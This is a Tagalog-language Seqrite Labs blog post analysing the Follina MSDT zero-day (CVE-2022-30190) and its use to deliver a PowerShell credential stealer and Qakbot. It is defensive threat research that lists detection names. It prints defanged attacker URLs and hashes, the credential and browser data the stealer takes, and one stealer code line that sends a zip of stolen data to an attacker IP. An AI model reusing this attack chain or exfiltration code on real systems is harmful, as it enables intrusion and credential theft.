• Mga Produkto at Serbisyo
        • Ulap

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Sa Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Maliit na negosyo

          • SOHO Total Edition
        • Serbisyo

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersecurity at Data Privacy Kamalayan
  • Solutions
    • BFSI
    • Edukasyon
    • Pamahalaan
    • Healthcare
    • ITeS
    • manufacturing
  • kompanya
    • Tungkol samin Seqrite
    • Pamumuno
    • Mga parangal at Sertipikasyon
    • silid-basahan
  • Kasosyo
    • Partner Program
    • Hanapin ang Kasosyo
    • Maging isang Kasosyo
  • Suporta
  • Mga mapagkukunan
    • blog
    • Puting papel
    • Mga Datasheet
    • Pag-aaral ng Kaso
    • Mga Ulat sa Banta
    • Manual
    • PoV
    • Unawa sa Data Privacy
    • Suriin ang Iyong Iskor sa Panganib
    • Mga Diyalogo ng DPDP
    • Oras ng Pagkapribado
Seqrite Labs Blog
Makipag-ugnay sa Sales Inaatake?
  • Mga Produkto at Serbisyo
        • Ulap

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Sa Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Maliit na negosyo

          • SOHO Total Edition
        • Serbisyo

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersecurity at Data Privacy Kamalayan
  • Solutions
    • BFSI
    • Edukasyon
    • Pamahalaan
    • Healthcare
    • ITeS
    • manufacturing
  • kompanya
    • Tungkol samin Seqrite
    • Pamumuno
    • Mga parangal at Sertipikasyon
    • silid-basahan
  • Kasosyo
    • Partner Program
    • Hanapin ang Kasosyo
    • Maging isang Kasosyo
  • Suporta
  • Mga mapagkukunan
    • blog
    • Puting papel
    • Mga Datasheet
    • Pag-aaral ng Kaso
    • Mga Ulat sa Banta
    • Manual
    • PoV
    • Unawa sa Data Privacy
    • Suriin ang Iyong Iskor sa Panganib
    • Mga Diyalogo ng DPDP
    • Oras ng Pagkapribado
Home   /  Cybersecurity  / CVE-2022-30190: Zero-day vulnerability “Follina” sa MSDT na pinagsamantalahan sa ligaw
CVE-2022-30190: Zero-day na kahinaan "Follina" sa MSDT na pinagsamantalahan sa ligaw
10 Hunyo 2022

CVE-2022-30190: Zero-day na kahinaan "Follina" sa MSDT na pinagsamantalahan sa ligaw

Sinulat ni Amruta Wagh
Amruta Wagh
Cybersecurity

Noong Mayo 30, 2022, CVE-2022-30190 “FOLLINA,” isang zero-day remote code execution vulnerability na natuklasan sa Microsoft Windows Support Diagnostic Tool (MSDT) na may mataas na kalubhaan (CVSS:9.3).

Ang MSDT tool na ito ay nagsusuri ng mga isyu sa mga application gaya ng mga dokumento ng Microsoft Office. Ang paunang vector ng pag-atake gaya ng mga dokumento ng salita ay gumagamit ng remote na paggana ng template upang i-download ang HTML file, na pagkatapos ay gumagamit ng URL protocol upang tawagan ang diagnostic tool (MSDT) na ito at magsagawa ng malisyosong code. Kasabay nito, ang mga unang pag-atake ay limitado sa Microsoft Word, ngunit kamakailan, ang mga vector ng pag-atake ay pinalawak upang isama ang RTF at Outlook.

Ang kahinaan na ito ay pinagsamantalahan sa ligaw, at ang mga aktor ng pagbabanta na matagumpay na nakakaimpluwensya dito ay maaaring magsagawa ng di-makatwirang code at mag-install ng mga karagdagang programa. Ginagamit ng mga banta ng aktor ang kapintasang ito para maikalat ang Backdoors, AsyncRAT, Quakbot, at iba pang malware sa mga consumer at sektor sa buong North America at Europe.

Detalyadong Pagsusuri ng Kahinaan:

Ang paunang aplikasyon sa pagtawag sa MSDT tool ay ang Microsoft Office (Word, Excel, RTF atbp.)

Fig. Diagram ng Daloy

Nasa ibaba ang isang halimbawa ng RTF Sample na pinangalanang "Employment_Agreement_Template." Gumagamit ang mga RTF na dokumentong ito ng mga OLE object.

Fig. RTF file na may Mga bagay na OLE

Kapag binuksan ang dokumentong ito, ipinapakita nito ang sumusunod na mensahe:-

Kapag nag-click ang biktima sa "Oo," ang isang naka-encode na HTML file ay dina-download mula sa naka-embed na link http[:]//45[.]76[.]53[.]253/1.html, gaya ng nakalarawan sa ibaba:-

Ang mga HTML na dokumento ay naglalaman ng nagkomento na "A" na mga character sa ibaba ng file na makikita sa ibaba ng code.

Fig. Naka-encode na data sa HTML file

Ang naka-embed na code sa loob ng HTML file ay humihimok ng PCWDiagnostic gamit ang ms-msdt na may parameter na IT_BrowseForFile na kinabibilangan ng PowerShell syntax. Ang na-decode na bahagi ng base64 na naka-encode na data ay -

Fig. Na-decode na data

Ihihinto ng code na ito ang msdt.exe kung ito ay tumatakbo at kumokonekta sa URL na “hXXps [:]//seller-notification [.]live/Zgfbe234dg” at nagda-download ng POWERSHELL script.

Ginamit ang Follina exploit upang i-deploy ang PowerShell-based Stealer . Suriin natin nang mas detalyado ang mga nilalaman nito:

Fig. Script Content part 1

Ang script ay nagsasaad sa loob ng Appdata/Roaming at sumusubok na magnakaw ng data sa pag-log in, cookies, atbp. ng mga application tulad ng Firefox, Opera, Yandex, Vivaldi, CentBrowser, Comodo, Chedot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc, AVAST Software, Chrome, Outlook, Thunderbird, NetSarang.

Ang magnanakaw ay nagtatanong sa registry upang magnakaw ng impormasyong nauugnay sa mga sumusunod na application: Autodesk, MobaXterm, Oray SunLogin RemoteClient, MailMaster, Navicat, WinSCP, Microsoft Office, FTP, RAdmin, atbp.

Fig. Script Content part 2

Bukod dito, nangongolekta din ito ng impormasyon na may kaugnayan sa makina:

  • Systeminfo (na kinabibilangan ng Hostname, impormasyong nauugnay sa OS, May-ari, impormasyon ng BIOS, Nakarehistrong May-ari
    ID ng Produkto, Petsa ng Orihinal na Pag-install, Oras ng Pag-boot ng System, Tagagawa ng System, Modelo ng System, Uri ng System, Processor, Bersyon ng BIOS, Lokal na System, Time Zone Kabuuang Pisikal na Memorya, Domain, Logon Server atbp.)
  • Pag-configure ng IP (sa pamamagitan ng Ipconfig)
  • Configuration ng Workstation
  • Impormasyon ng User Account
  • Mga Administrator ng Lokal na Grupo
  • Mga bersyon ng pangalan ng produkto

Ang isang .zip file ay ginawa sa %temp% at ipinadala sa URL:

$http_url = “hxxp://45[.]77.156[.]179:443/” + $ip + “———-” + $time1 + “.zip”

Ang $time1 ay ang epoch timestamp na kinakalkula ng

Ito ay gumaganap bilang isang Virtualization check din.

Tingnan natin ang isa pang halimbawa ng Quakbot :

Ang email ng phishing na naglalaman ng mga nakakahamak na html attachment ay nagda-download ng mga archive na file (.img) (ed63c189b52e4eb663598dc0c3121e05). Naglalaman ang archive na ito ng .lnk (76390978f26d3c6d7f799257542796ce), qbot payload (a14d48974eab6839b1238f984b3c28d2) at doc file (e7015438268464cedad98cedad1544cedad).

Fig. Diagram ng Daloy

Ang qbot payload sa zip ay isinasagawa sa pamamagitan ng .lnk, at dina-download ng .doc file ang HTML file. Ang .html file na ito ay muling nagda-download ng isa pang .qbot payload sa pamamagitan ng pagsasamantala sa Follina.

Dito dina-download ang HTML file mula sa http[:]//185[.]234[.]247[.]119 at naglalaman ng data na ipinapakita sa sumusunod na figure:-

Fig. HTML file data

Kumokonekta ang HTML na ito sa mga URL sa itaas at nagda-download ng Quakbot dll(ce86511634b5420332eb6267c0e2ae2e) na pagkatapos ay isinasagawa sa pamamagitan ng regsvr32.exe

Pagsusuri:

 Ang quakbot file na ito ay isang Delphi compiled file na mayroong naka-encrypt na data sa seksyong .rsrc sa loob ng RCDATA, na nade-decrypt sa halos inilaan na memorya. Ipinapakita ng mga figure sa ibaba ang naka-encrypt na data at ang Decryption loop.

Fig. Naka-encrypt na data 

Fig. Deskripsyon loop

Ito ay ide-decrypt sa mga API at 1st stage PE file

Ang daloy ay napupunta na ngayon sa 1st stage, na responsable para sa DLL Injection at dinadala ang Quakbot payload sa memorya. Ginagawa ang RC4 decryption sa mga naka-encrypt na string, na nagdadala sa listahan ng proseso tulad ng mga prosesong nauugnay sa AV atbp. Kung makikitang tumatakbo ang mga ito, lalabas ang payload. Sa figure sa ibaba, makikita natin ang mga prosesong sinusuri.

Kasama sa listahan ng prosesong sinusuri ang:-

Sa paglaon, nagsasagawa ito ng proseso ng pag-iniksyon sa "onedrivesetup.exe": -

Ang Qbot ay nauugnay sa kampanyang "obama186". Ibinigay sa ibaba ang larawan na nagpapakita ng mga koneksyon sa C2 mula sa "onedrivesetup.exe": -

Mga diskarte sa bypass:

Nakita namin ang mga umaatake na gumagamit ng mga pamamaraan ng pag-encode sa mga paunang vector ng pag-atake upang i-bypass ang mga pagtuklas. Ang mga sumusunod na halimbawa ay naglalarawan nito.

Fig. Halimbawa blg.1

Fig. Halimbawa blg.2

Paghihinuha:

Ito ay isa sa mga pinaka-kritikal na zero-day sa mga kamakailang panahon. Gumamit ang CVE na ito ng maraming diskarte sa bypass, walang pag-aayos, at madaling mapagsamantalahan. Matapos maging available ang patch ng seguridad mula sa Microsoft, dapat agad itong ayusin ng mga User. Hanggang sa panahong iyon, pinapayuhan namin ang mga organisasyon na maging alerto at sundin ang mga nagpapagaan na aksyon sa ibaba upang mabawasan ang pag-atake at posibleng pinsala. 

Para sa Remediation ng 'Follina', Mangyaring sundin ang payo:

 https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/

Paano pinoprotektahan ng Quick Heal ang mga customer nito?

Pinoprotektahan ng mga kasalukuyang advanced na teknolohiya ng proteksyon ng mga produkto ng Quick Heal ang aming mga customer laban sa Follina.

Mayroon kaming detection na pinangalanang “CVE_2022_30190_Follina” para sa Follina sa aming behavioral technology. Gayundin, sa Seqrite Produkto ng Hawk Hunt, mayroon kaming patakaran na tinatawag na “QHIR_CVE_2022_30190_Follina” upang matukoy ang pag-atakeng ito.

Ang mga sumusunod ay ang file-based at network-based na mga detection para sa Follina:

1. Nakabatay sa file:

  • Backdoor.Turian.S28183972
  • Trojan.Qbot.S28211728
  • CVE-2022-30190.46655
  • CVE-2022-30190.46638
  • CVE-2022-30190.46635
  • CVE-2022-30190.46624

2.Batay sa network:

  • CVE-2022-30190.RCE!46674
  • CVE-2022-30190.RCE!46675

 

Paksang Paksang Paksang

Tejaswini Sandapolla

Amruta Wagh

 nakaraang PostBanta Advisory: CVE-2022-30190 'Follina' – Malubhang Zero-araw...
susunod na Post  CVE-2022-26134: Aktibong Pinagsasamantalahan ang Atlassian OGNL Injection Zero-...
Amruta Wagh

Tungkol kay Amruta Wagh

Si Amruta ay isang Security Researcher sa Quick Heal Technologies. Interesado siya sa pagsusuri sa Malware , Reverse Engineering at naghahanap ng kasalukuyang malware...

Mga artikulo ni Amruta Wagh »

Kaugnay na Post

  • Bakit Threat IntelAng Ligency ang Nawawalang Link sa Iyong Istratehiya sa Cybersecurity

    Hulyo 25, 2025
  • Lured and Compromised: Unmasking the Digital Danger of Honey Traps

    Hunyo 17, 2025
  • Operation Sindoor – Anatomy of a Digital Siege

    Mayo 23, 2025
Mga Tampok na May-akda
  • Seqrite
    Seqrite

    Seqrite ay isang nangungunang tagapagbigay ng mga solusyon sa cybersecurity para sa mga negosyo. Nakatuon...

    Magbasa pa ng mga artikulo ni Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ako ay isang masugid na manunulat na nasisiyahan sa paggawa ng nilalaman tungkol sa mga umuusbong na teknolohiya at...

    Magbasa pa ng mga artikulo ni Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ako ay isang masigasig na mahilig sa cybersecurity at isang dedikadong manunulat. May talino...

    Magbasa pa ng mga artikulo ni Bineesh P
  • Sanjay Katkar
    Sanjay Katkar

    Si Sanjay Katkar ay ang Pinagsamang Managing Director ng Quick Heal Technologies...

    Magbasa pa ng mga artikulo ni Sanjay Katkar
Paksa
malamang (25) Pag-atake sa cyber (36) cyber-atake (58) cyberattack (16) cyberattacks (15) Cybersecurity (341) cyber seguridad (34) Banta ng cyber (33) pagbabanta cyber (51) data paglabag (56) mga paglabag sa data (29) pagkawala ng data (28) pag-iwas sa pagkawala ng data (34) data privacy (16) proteksyon ng data (34) data security (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) endpoint security (113) Seguridad sa enterprise (20) Pagsamantalahan (13) GDPR (14) malware (76) pagsusuri ng malware (14) pag-atake ng malware (23) MDM (27) microsoft (15) MITER ATT&CK (14) Seguridad sa network (26) Phishing (30) ransomware (69) atake ng ransomware (31) atake ng ransomware (31) proteksyon sa ransomware (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Serbisyo (16) pagbabanta ng pagbabanta (14) Threat Intelligence (21) UTM (34) Kahinaan (16) zero tiwala (13)
Seqrite Labs

Nangunguna sa enterprise IT security solutions provider na pinapasimple ang endpoint, data, at network security na may pinakamahusay na in-class na mga solusyon sa pag-iwas, pagtuklas, at pagtugon sa pagbabanta sa buong mundo.

Magbasa pa tungkol sa Seqrite

Sundan kami:

Mag-subscribe Upang Ang aming Newsletter

Manatiling may alam tungkol sa pinakabagong mga uso at insight sa cybersecurity.

Pagkarga
Mga Produkto at Serbisyo
  • Ulap
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Sa Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • Micro Business
  • SOHO Total Edition
  • Serbisyo
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cybersecurity at Data Privacy Kamalayan
Mga mapagkukunan
  • blog
  • Puting papel
  • Mga Datasheet
  • Mga Ulat sa Banta
  • Manual
  • PoV
  • Unawa sa Data Privacy
  • Mga Diyalogo ng DPDP
  • Patakaran at Pagsunod
  • EULA
  • GoDeep.AI
  • SIA
  • Oras ng Pagkapribado
Makipag-ugnayan sa amin
  • Mga Rehistradong Tanggapan
  • Pag-usapan natin ang Cybersecurity
Suporta
  • Teknikal na Suporta
  • I-download ang Software
  • Offline Updater
  • Mga Pag-upgrade sa Firmware
  • Upgrade
  • Documentation ng Produkto
Sa
  • Tungkol samin Seqrite
  • Pamumuno
  • Mga Gantimpala at Pagkilala
  • silid-basahan
Kasosyo
  • Partner Program
  • Hanapin ang Kasosyo
  • Maging isang Kasosyo
  • Seqrite certification

© 2026 Quick Heal Technologies Ltd.

Sitemap Mga Patakaran sa Privacy legal Notices Mga Patakaran sa Cookie Mga Tuntunin ng Paggamit